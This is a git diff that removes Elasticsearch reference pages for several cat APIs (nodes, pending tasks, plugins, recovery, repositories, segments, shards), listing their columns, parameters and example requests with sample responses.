`fielddataEvictions`:: -Fielddata cache evictions, such as `0`. - -`query_cache.memory_size`, `qcm`, `queryCacheMemory`:: -Used query cache memory, such as `0b`. - -`query_cache.evictions`, `qce`, `queryCacheEvictions`:: -Query cache evictions, such as `0`. - -`query_cache.hit_count`, `qchc`, `queryCacheHitCount`:: -Query cache hit count, such as `0`. - -`query_cache.miss_count`, `qcmc`, `queryCacheMissCount`:: -Query cache miss count, such as `0`. 
- -`request_cache.memory_size`, `rcm`, `requestCacheMemory`:: -Used request cache memory, such as `0b`. - -`request_cache.evictions`, `rce`, `requestCacheEvictions`:: -Request cache evictions, such as `0`. - -`request_cache.hit_count`, `rchc`, `requestCacheHitCount`:: -Request cache hit count, such as `0`. - -`request_cache.miss_count`, `rcmc`, `requestCacheMissCount`:: -Request cache miss count, such as `0`. - -`flush.total`, `ft`, `flushTotal`:: -Number of flushes, such as `1`. - -`flush.total_time`, `ftt`, `flushTotalTime`:: -Time spent in flush, such as `1`. - -`get.current`, `gc`, `getCurrent`:: -Number of current get operations, such as `0`. - -`get.time`, `gti`, `getTime`:: -Time spent in get, such as `14ms`. - -`get.total`, `gto`, `getTotal`:: -Number of get operations, such as `2`. - -`get.exists_time`, `geti`, `getExistsTime`:: -Time spent in successful gets, such as `14ms`. - -`get.exists_total`, `geto`, `getExistsTotal`:: -Number of successful get operations, such as `2`. - -`get.missing_time`, `gmti`, `getMissingTime`:: -Time spent in failed gets, such as `0s`. - -`get.missing_total`, `gmto`, `getMissingTotal`:: -Number of failed get operations, such as `1`. - -`indexing.delete_current`, `idc`, `indexingDeleteCurrent`:: -Number of current deletion operations, such as `0`. - -`indexing.delete_time`, `idti`, `indexingDeleteTime`:: -Time spent in deletions, such as `2ms`. - -`indexing.delete_total`, `idto`, `indexingDeleteTotal`:: -Number of deletion operations, such as `2`. - -`indexing.index_current`, `iic`, `indexingIndexCurrent`:: -Number of current indexing operations, such as `0`. - -`indexing.index_time`, `iiti`, `indexingIndexTime`:: -Time spent in indexing, such as `134ms`. - -`indexing.index_total`, `iito`, `indexingIndexTotal`:: -Number of indexing operations, such as `1`. - -`indexing.index_failed`, `iif`, `indexingIndexFailed`:: -Number of failed indexing operations, such as `0`. - -`merges.current`, `mc`, `mergesCurrent`:: -Number of current merge operations, such as `0`. - -`merges.current_docs`, `mcd`, `mergesCurrentDocs`:: -Number of current merging documents, such as `0`. - -`merges.current_size`, `mcs`, `mergesCurrentSize`:: -Size of current merges, such as `0b`. - -`merges.total`, `mt`, `mergesTotal`:: -Number of completed merge operations, such as `0`. - -`merges.total_docs`, `mtd`, `mergesTotalDocs`:: -Number of merged documents, such as `0`. - -`merges.total_size`, `mts`, `mergesTotalSize`:: -Size of current merges, such as `0b`. - -`merges.total_time`, `mtt`, `mergesTotalTime`:: -Time spent merging documents, such as `0s`. - -`refresh.total`, `rto`, `refreshTotal`:: -Number of refreshes, such as `16`. - -`refresh.time`, `rti`, `refreshTime`:: -Time spent in refreshes, such as `91ms`. - -`script.compilations`, `scrcc`, `scriptCompilations`:: -Total script compilations, such as `17`. - -`script.cache_evictions`, `scrce`, `scriptCacheEvictions`:: -Total compiled scripts evicted from cache, such as `6`. - -`search.fetch_current`, `sfc`, `searchFetchCurrent`:: -Current fetch phase operations, such as `0`. - -`search.fetch_time`, `sfti`, `searchFetchTime`:: -Time spent in fetch phase, such as `37ms`. - -`search.fetch_total`, `sfto`, `searchFetchTotal`:: -Number of fetch operations, such as `7`. - -`search.open_contexts`, `so`, `searchOpenContexts`:: -Open search contexts, such as `0`. - -`search.query_current`, `sqc`, `searchQueryCurrent`:: -Current query phase operations, such as `0`. 
- -`search.query_time`, `sqti`, `searchQueryTime`:: -Time spent in query phase, such as `43ms`. - -`search.query_total`, `sqto`, `searchQueryTotal`:: -Number of query operations, such as `9`. - -`search.scroll_current`, `scc`, `searchScrollCurrent`:: -Open scroll contexts, such as `2`. - -`search.scroll_time`, `scti`, `searchScrollTime`:: -Time scroll contexts held open, such as `2m`. - -`search.scroll_total`, `scto`, `searchScrollTotal`:: -Completed scroll contexts, such as `1`. - -`segments.count`, `sc`, `segmentsCount`:: -Number of segments, such as `4`. - -`segments.memory`, `sm`, `segmentsMemory`:: -Memory used by segments, such as `1.4kb`. - -`segments.index_writer_memory`, `siwm`, `segmentsIndexWriterMemory`:: -Memory used by index writer, such as `18mb`. - -`segments.version_map_memory`, `svmm`, `segmentsVersionMapMemory`:: -Memory used by version map, such as `1.0kb`. - -`segments.fixed_bitset_memory`, `sfbm`, `fixedBitsetMemory`:: -Memory used by fixed bit sets for nested object field types and type filters for -types referred in <> fields, such as `1.0kb`. - -`suggest.current`, `suc`, `suggestCurrent`:: -Number of current suggest operations, such as `0`. - -`suggest.time`, `suti`, `suggestTime`:: -Time spent in suggest, such as `0`. - -`suggest.total`, `suto`, `suggestTotal`:: -Number of suggest operations, such as `0`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -`local`:: -(Optional, boolean) -deprecated:[7.6.0,This parameter does not cause this API to act locally. It will be removed in version 8.0.] -If `true`, the request computes the list of selected nodes from the local -cluster state. Defaults to `false`, which means the list of selected nodes is -computed from the cluster state on the master node. In either case the -coordinating node sends a request for further information to each selected -node. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-nodes-api-example]] -==== {api-examples-title} - -[[cat-nodes-api-ex-default]] -===== Example with default columns - -[source,console] --------------------------------------------------- -GET /_cat/nodes?v=true --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -ip heap.percent ram.percent cpu load_1m load_5m load_15m node.role master name -127.0.0.1 65 99 42 3.07 dim * mJw06l1 --------------------------------------------------- -// TESTRESPONSE[s/3.07/(\\d+\\.\\d+( \\d+\\.\\d+ (\\d+\\.\\d+)?)?)?/] -// TESTRESPONSE[s/65 99 42/\\d+ \\d+ \\d+/] -// TESTRESPONSE[s/dim/.+/ s/[*]/[*]/ s/mJw06l1/.+/ non_json] - -The `ip`, `heap.percent`, `ram.percent`, `cpu`, and `load_*` columns provide the -IP addresses and performance information of each node. - -The `node.role`, `master`, and `name` columns provide information useful for -monitoring an entire cluster, particularly large ones. - - -[[cat-nodes-api-ex-headings]] -===== Example with explicit columns -The following API request returns the `id`, `ip`, `port`, `v` (version), and `m` -(master) columns. 
- -[source,console] --------------------------------------------------- -GET /_cat/nodes?v=true&h=id,ip,port,v,m --------------------------------------------------- - -The API returns the following response: - -["source","txt",subs="attributes,callouts"] --------------------------------------------------- -id ip port v m -veJR 127.0.0.1 59938 {version} * --------------------------------------------------- -// TESTRESPONSE[s/veJR/.+/ s/59938/\\d+/ s/[*]/[*]/ non_json] diff --git a/docs/reference/cat/pending_tasks.asciidoc b/docs/reference/cat/pending_tasks.asciidoc deleted file mode 100644 index 8597dba4dfa..00000000000 --- a/docs/reference/cat/pending_tasks.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[cat-pending-tasks]] -=== cat pending tasks API -++++ -cat pending tasks -++++ - -Returns cluster-level changes that have not yet been executed, similar to the -<> API. - -[[cat-pending-tasks-api-request]] -==== {api-request-title} - -`GET /_cat/pending_tasks` - -[[cat-pending-tasks-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-pending-tasks-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-pending-tasks-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/pending_tasks?v=true --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -insertOrder timeInQueue priority source - 1685 855ms HIGH update-mapping [foo][t] - 1686 843ms HIGH update-mapping [foo][t] - 1693 753ms HIGH refresh-mapping [foo][[t]] - 1688 816ms HIGH update-mapping [foo][t] - 1689 802ms HIGH update-mapping [foo][t] - 1690 787ms HIGH update-mapping [foo][t] - 1691 773ms HIGH update-mapping [foo][t] --------------------------------------------------- -// TESTRESPONSE[s/(\n.+)+/(\\n.+)*/ non_json] -// We can't assert anything about the tasks in progress here because we don't -// know what might be in progress.... diff --git a/docs/reference/cat/plugins.asciidoc b/docs/reference/cat/plugins.asciidoc deleted file mode 100644 index 40207186b6e..00000000000 --- a/docs/reference/cat/plugins.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[cat-plugins]] -=== cat plugins API -++++ -cat plugins -++++ - -Returns a list of plugins running on each node of a cluster. - - -[[cat-plugins-api-request]] -==== {api-request-title} - -`GET /_cat/plugins` - -[[cat-plugins-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. 
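If you only want to confirm that a particular plugin is present on every node, a plain `curl` call against this endpoint is often enough. The following sketch is illustrative only; the `analysis-icu` plugin name and the `localhost:9200` address are assumptions:

[source,sh]
--------------------------------------------------
curl -s "localhost:9200/_cat/plugins?h=name,component" | grep analysis-icu
--------------------------------------------------
// NOTCONSOLE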
- -[[cat-plugins-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-plugins-api-example]] -==== {api-examples-title} - -[source,console] ------------------------------------------------------------------------------- -GET /_cat/plugins?v=true&s=component&h=name,component,version,description ------------------------------------------------------------------------------- - -The API returns the following response: - -["source","txt",subs="attributes,callouts"] ------------------------------------------------------------------------------- -name component version description -U7321H6 analysis-icu {version_qualified} The ICU Analysis plugin integrates the Lucene ICU module into Elasticsearch, adding ICU-related analysis components. -U7321H6 analysis-kuromoji {version_qualified} The Japanese (kuromoji) Analysis plugin integrates Lucene kuromoji analysis module into elasticsearch. -U7321H6 analysis-nori {version_qualified} The Korean (nori) Analysis plugin integrates Lucene nori analysis module into elasticsearch. -U7321H6 analysis-phonetic {version_qualified} The Phonetic Analysis plugin integrates phonetic token filter analysis with elasticsearch. -U7321H6 analysis-smartcn {version_qualified} Smart Chinese Analysis plugin integrates Lucene Smart Chinese analysis module into elasticsearch. -U7321H6 analysis-stempel {version_qualified} The Stempel (Polish) Analysis plugin integrates Lucene stempel (polish) analysis module into elasticsearch. -U7321H6 analysis-ukrainian {version_qualified} The Ukrainian Analysis plugin integrates the Lucene UkrainianMorfologikAnalyzer into elasticsearch. -U7321H6 discovery-azure-classic {version_qualified} The Azure Classic Discovery plugin allows to use Azure Classic API for the unicast discovery mechanism -U7321H6 discovery-ec2 {version_qualified} The EC2 discovery plugin allows to use AWS API for the unicast discovery mechanism. -U7321H6 discovery-gce {version_qualified} The Google Compute Engine (GCE) Discovery plugin allows to use GCE API for the unicast discovery mechanism. -U7321H6 ingest-attachment {version_qualified} Ingest processor that uses Apache Tika to extract contents -U7321H6 mapper-annotated-text {version_qualified} The Mapper Annotated_text plugin adds support for text fields with markup used to inject annotation tokens into the index. -U7321H6 mapper-murmur3 {version_qualified} The Mapper Murmur3 plugin allows to compute hashes of a field's values at index-time and to store them in the index. -U7321H6 mapper-size {version_qualified} The Mapper Size plugin allows document to record their uncompressed size at index time. -U7321H6 store-smb {version_qualified} The Store SMB plugin adds support for SMB stores. -U7321H6 transport-nio {version_qualified} The nio transport. 
------------------------------------------------------------------------------- -// TESTRESPONSE[s/([.()])/\\$1/ s/U7321H6/.+/ non_json] \ No newline at end of file diff --git a/docs/reference/cat/recovery.asciidoc b/docs/reference/cat/recovery.asciidoc deleted file mode 100644 index 6c91b313cac..00000000000 --- a/docs/reference/cat/recovery.asciidoc +++ /dev/null @@ -1,153 +0,0 @@ -[[cat-recovery]] -=== cat recovery API -++++ -cat recovery -++++ - - -Returns information about ongoing and completed shard recoveries, -similar to the <> API. - -For data streams, the API returns information about the stream's backing -indices. - -[[cat-recovery-api-request]] -==== {api-request-title} - -`GET /_cat/recovery/` - -`GET /_cat/recovery` - -[[cat-recovery-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-recovery-api-desc]] -==== {api-description-title} - -The cat recovery API returns information about shard recoveries, both -ongoing and completed. It is a more compact view of the JSON -<> API. - -include::{es-repo-dir}/indices/recovery.asciidoc[tag=shard-recovery-desc] - - -[[cat-recovery-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[cat-recovery-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=active-only] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-query-parm] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-recovery-api-example]] -==== {api-examples-title} - -[[cat-recovery-api-ex-dead]] -===== Example with no ongoing recoveries - -[source,console] ----------------------------------------------------------------------------- -GET _cat/recovery?v=true ----------------------------------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -index shard time type stage source_host source_node target_host target_node repository snapshot files files_recovered files_percent files_total bytes bytes_recovered bytes_percent bytes_total translog_ops translog_ops_recovered translog_ops_percent -my-index-000001 0 13ms store done n/a n/a 127.0.0.1 node-0 n/a n/a 0 0 100% 13 0 0 100% 9928 0 0 100.0% ---------------------------------------------------------------------------- -// TESTRESPONSE[s/store/empty_store/] -// TESTRESPONSE[s/100%/0.0%/] -// TESTRESPONSE[s/9928/0/] -// TESTRESPONSE[s/13ms/[0-9.]+m?s/] -// TESTRESPONSE[s/13/\\d+/ non_json] - -In this example response, the source and target nodes are 
the same because the
-recovery type is `store`, meaning they were read from local storage on node
-start.
-
-[[cat-recovery-api-ex-live]]
-===== Example with a live shard recovery
-
-By increasing the replica count of an index and bringing another node online to
-host the replicas, you can retrieve information about an ongoing recovery.
-
-[source,console]
------------------------------------------------------------------------------
-GET _cat/recovery?v=true&h=i,s,t,ty,st,shost,thost,f,fp,b,bp
------------------------------------------------------------------------------
-// TEST[setup:my_index]
-
-The API returns the following response:
-
-[source,txt]
------------------------------------------------------------------------------
-i s t ty st shost thost f fp b bp
-my-index-000001 0 1252ms peer done 192.168.1.1 192.168.1.2 0 100.0% 0 100.0%
------------------------------------------------------------------------------
-// TESTRESPONSE[s/peer/empty_store/]
-// TESTRESPONSE[s/192.168.1.2/127.0.0.1/]
-// TESTRESPONSE[s/192.168.1.1/n\/a/]
-// TESTRESPONSE[s/100.0%/0.0%/]
-// TESTRESPONSE[s/1252ms/[0-9.]+m?s/ non_json]
-
-In this example response, the recovery type is `peer`, meaning the shard
-recovered from another node. The returned files and bytes are real-time
-measurements.
-
-[[cat-recovery-api-ex-snapshot]]
-===== Example with a snapshot recovery
-
-You can restore backups of an index using the <> API. You can use the cat recovery API to retrieve information about a
-snapshot recovery.
-
-[source,console]
---------------------------------------------------------------------------------
-GET _cat/recovery?v=true&h=i,s,t,ty,st,rep,snap,f,fp,b,bp
---------------------------------------------------------------------------------
-// TEST[skip:no need to execute snapshot/restore here]
-
-The API returns the following response with a recovery type of `snapshot`:
-
-[source,txt]
---------------------------------------------------------------------------------
-i s t ty st rep snap f fp b bp
-my-index-000001 0 1978ms snapshot done my-repo snap_1 79 8.0% 12086 9.0%
---------------------------------------------------------------------------------
-// TESTRESPONSE[non_json]
\ No newline at end of file
diff --git a/docs/reference/cat/repositories.asciidoc b/docs/reference/cat/repositories.asciidoc
deleted file mode 100644
index bdcf8a589ea..00000000000
--- a/docs/reference/cat/repositories.asciidoc
+++ /dev/null
@@ -1,57 +0,0 @@
-[[cat-repositories]]
-=== cat repositories API
-++++
-cat repositories
-++++
-
-Returns the <> for a cluster.
-
-
-[[cat-repositories-api-request]]
-==== {api-request-title}
-
-`GET /_cat/repositories`
-
-[[cat-repositories-api-prereqs]]
-==== {api-prereq-title}
-
-* If the {es} {security-features} are enabled, you must have the
-`monitor_snapshot`, `create_snapshot`, or `manage`
-<> to use this API.
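Nothing is listed until at least one snapshot repository has been registered. The following sketch mirrors the `repo1` filesystem repository used by the example at the end of this page (illustrative only, not part of the tested snippets):

[source,console]
--------------------------------------------------
PUT /_snapshot/repo1
{
  "type": "fs",
  "settings": { "location": "repo/1" }
}

GET /_cat/repositories?v=true
--------------------------------------------------
// TEST[skip:editorial sketch, not part of the tested examples]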
- -[[cat-repositories-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-repositories-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/repositories?v=true --------------------------------------------------- -// TEST[s/^/PUT \/_snapshot\/repo1\n{"type": "fs", "settings": {"location": "repo\/1"}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id type -repo1 fs -repo2 s3 --------------------------------------------------- -// TESTRESPONSE[s/\nrepo2 s3// non_json] diff --git a/docs/reference/cat/segments.asciidoc b/docs/reference/cat/segments.asciidoc deleted file mode 100644 index 7bc38e00777..00000000000 --- a/docs/reference/cat/segments.asciidoc +++ /dev/null @@ -1,136 +0,0 @@ -[[cat-segments]] -=== cat segments API -++++ -cat segments -++++ - -Returns low-level information about the https://lucene.apache.org/core/[Lucene] -segments in index shards, similar to the <> -API. - -For data streams, the API returns information about the stream's backing -indices. - -[[cat-segments-api-request]] -==== {api-request-title} - -`GET /_cat/segments/` - -`GET /_cat/segments` - -[[cat-segments-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-segments-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-segments-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`index`, `i`, `idx`:: -(Default) Name of the index. - -`shard`, `s`, `sh`:: -(Default) Name of the shard. - -`prirep`, `p`, `pr`, `primaryOrReplica`:: -(Default) Shard type. Returned values are `primary` or `replica`. - -`ip`:: -(Default) IP address of the segment's shard, such as `127.0.1.1`. 
- -`segment`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment] - -`generation`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=generation] - -`docs.count`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-count] - -`docs.deleted`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-deleted] - -`size`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-size] - -`size.memory`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=memory] - -`committed`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=committed] - -`searchable`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-search] - -`version`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-version] - -`compound`:: -(Default) If `true`, the segment is stored in a compound file. This means Lucene -merged all files from the segment in a single file to save file descriptors. - -`id`:: -ID of the node, such as `k0zy`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-segments-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/segments?v=true --------------------------------------------------- -// TEST[s/^/PUT \/test\/test\/1?refresh\n{"test":"test"}\nPUT \/test1\/test\/1?refresh\n{"test":"test"}\n/] - -The API returns the following response: - -["source","txt",subs="attributes,callouts"] --------------------------------------------------- -index shard prirep ip segment generation docs.count docs.deleted size size.memory committed searchable version compound -test 0 p 127.0.0.1 _0 0 1 0 3kb 2042 false true {lucene_version} true -test1 0 p 127.0.0.1 _0 0 1 0 3kb 2042 false true {lucene_version} true --------------------------------------------------- -// TESTRESPONSE[s/3kb/\\d+(\\.\\d+)?[mk]?b/ s/2042/\\d+/ non_json] diff --git a/docs/reference/cat/shards.asciidoc b/docs/reference/cat/shards.asciidoc deleted file mode 100644 index 54a79c2b999..00000000000 --- a/docs/reference/cat/shards.asciidoc +++ /dev/null @@ -1,406 +0,0 @@ -[[cat-shards]] -=== cat shards API -++++ -cat shards -++++ - -The `shards` command is the detailed view of what nodes contain which -shards. It will tell you if it's a primary or replica, the number of -docs, the bytes it takes on disk, and the node where it's located. - -For data streams, the API returns information about the stream's backing -indices. - - -[[cat-shards-api-request]] -==== {api-request-title} - -`GET /_cat/shards/` - -`GET /_cat/shards` - -[[cat-shards-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-shards-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. 
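For example, to limit the response to a single index by name rather than a wildcard, the request might look like this sketch (illustrative only; `my-index-000001` is the index used in the examples below):

[source,console]
--------------------------------------------------
GET /_cat/shards/my-index-000001?v=true
--------------------------------------------------
// TEST[skip:editorial sketch, not part of the tested examples]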
- -[[cat-shards-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`index`, `i`, `idx`:: -(Default) Name of the index. - -`shard`, `s`, `sh`:: -(Default) Name of the shard. - -`prirep`, `p`, `pr`, `primaryOrReplica`:: -(Default) Shard type. Returned values are `primary` or `replica`. - -`state`, `st`:: -(Default) State of the shard. Returned values are: -+ -* `INITIALIZING`: The shard is recovering from a peer shard or gateway. -* `RELOCATING`: The shard is relocating. -* `STARTED`: The shard has started. -* `UNASSIGNED`: The shard is not assigned to any node. - -`docs`, `d`, `dc`:: -(Default) Number of documents in shard, such as `25`. - -`store`, `sto`:: -(Default) Disk space used by the shard, such as `5kb`. - -`ip`:: -(Default) IP address of the node, such as `127.0.1.1`. - -`id`:: -(Default) ID of the node, such as `k0zy`. - -`node`, `n`:: -(Default) Node name, such as `I8hydUG`. - -`completion.size`, `cs`, `completionSize`:: -Size of completion, such as `0b`. - -`fielddata.memory_size`, `fm`, `fielddataMemory`:: -Used fielddata cache memory, such as `0b`. - -`fielddata.evictions`, `fe`, `fielddataEvictions`:: -Fielddata cache evictions, such as `0`. - -`flush.total`, `ft`, `flushTotal`:: -Number of flushes, such as `1`. - -`flush.total_time`, `ftt`, `flushTotalTime`:: -Time spent in flush, such as `1`. - -`get.current`, `gc`, `getCurrent`:: -Number of current get operations, such as `0`. - -`get.time`, `gti`, `getTime`:: -Time spent in get, such as `14ms`. - -`get.total`, `gto`, `getTotal`:: -Number of get operations, such as `2`. - -`get.exists_time`, `geti`, `getExistsTime`:: -Time spent in successful gets, such as `14ms`. - -`get.exists_total`, `geto`, `getExistsTotal`:: -Number of successful get operations, such as `2`. - -`get.missing_time`, `gmti`, `getMissingTime`:: -Time spent in failed gets, such as `0s`. - -`get.missing_total`, `gmto`, `getMissingTotal`:: -Number of failed get operations, such as `1`. - -`indexing.delete_current`, `idc`, `indexingDeleteCurrent`:: -Number of current deletion operations, such as `0`. - -`indexing.delete_time`, `idti`, `indexingDeleteTime`:: -Time spent in deletions, such as `2ms`. - -`indexing.delete_total`, `idto`, `indexingDeleteTotal`:: -Number of deletion operations, such as `2`. - -`indexing.index_current`, `iic`, `indexingIndexCurrent`:: -Number of current indexing operations, such as `0`. - -`indexing.index_time`, `iiti`, `indexingIndexTime`:: -Time spent in indexing, such as `134ms`. - -`indexing.index_total`, `iito`, `indexingIndexTotal`:: -Number of indexing operations, such as `1`. - -`indexing.index_failed`, `iif`, `indexingIndexFailed`:: -Number of failed indexing operations, such as `0`. - -`merges.current`, `mc`, `mergesCurrent`:: -Number of current merge operations, such as `0`. - -`merges.current_docs`, `mcd`, `mergesCurrentDocs`:: -Number of current merging documents, such as `0`. - -`merges.current_size`, `mcs`, `mergesCurrentSize`:: -Size of current merges, such as `0b`. - -`merges.total`, `mt`, `mergesTotal`:: -Number of completed merge operations, such as `0`. 
- -`merges.total_docs`, `mtd`, `mergesTotalDocs`:: -Number of merged documents, such as `0`. - -`merges.total_size`, `mts`, `mergesTotalSize`:: -Size of current merges, such as `0b`. - -`merges.total_time`, `mtt`, `mergesTotalTime`:: -Time spent merging documents, such as `0s`. - -`query_cache.memory_size`, `qcm`, `queryCacheMemory`:: -Used query cache memory, such as `0b`. - -`query_cache.evictions`, `qce`, `queryCacheEvictions`:: -Query cache evictions, such as `0`. - -`recoverysource.type`, `rs`:: -Type of recovery source. - -`refresh.total`, `rto`, `refreshTotal`:: -Number of refreshes, such as `16`. - -`refresh.time`, `rti`, `refreshTime`:: -Time spent in refreshes, such as `91ms`. - -`search.fetch_current`, `sfc`, `searchFetchCurrent`:: -Current fetch phase operations, such as `0`. - -`search.fetch_time`, `sfti`, `searchFetchTime`:: -Time spent in fetch phase, such as `37ms`. - -`search.fetch_total`, `sfto`, `searchFetchTotal`:: -Number of fetch operations, such as `7`. - -`search.open_contexts`, `so`, `searchOpenContexts`:: -Open search contexts, such as `0`. - -`search.query_current`, `sqc`, `searchQueryCurrent`:: -Current query phase operations, such as `0`. - -`search.query_time`, `sqti`, `searchQueryTime`:: -Time spent in query phase, such as `43ms`. - -`search.query_total`, `sqto`, `searchQueryTotal`:: -Number of query operations, such as `9`. - -`search.scroll_current`, `scc`, `searchScrollCurrent`:: -Open scroll contexts, such as `2`. - -`search.scroll_time`, `scti`, `searchScrollTime`:: -Time scroll contexts held open, such as `2m`. - -`search.scroll_total`, `scto`, `searchScrollTotal`:: -Completed scroll contexts, such as `1`. - -`segments.count`, `sc`, `segmentsCount`:: -Number of segments, such as `4`. - -`segments.memory`, `sm`, `segmentsMemory`:: -Memory used by segments, such as `1.4kb`. - -`segments.index_writer_memory`, `siwm`, `segmentsIndexWriterMemory`:: -Memory used by index writer, such as `18mb`. - -`segments.version_map_memory`, `svmm`, `segmentsVersionMapMemory`:: -Memory used by version map, such as `1.0kb`. - -`segments.fixed_bitset_memory`, `sfbm`, `fixedBitsetMemory`:: -Memory used by fixed bit sets for nested object field types and type filters for -types referred in <> fields, such as `1.0kb`. - -`seq_no.global_checkpoint`, `sqg`, `globalCheckpoint`:: -Global checkpoint. - -`seq_no.local_checkpoint`, `sql`, `localCheckpoint`:: -Local checkpoint. - -`seq_no.max`, `sqm`, `maxSeqNo`:: -Maximum sequence number. - -`suggest.current`, `suc`, `suggestCurrent`:: 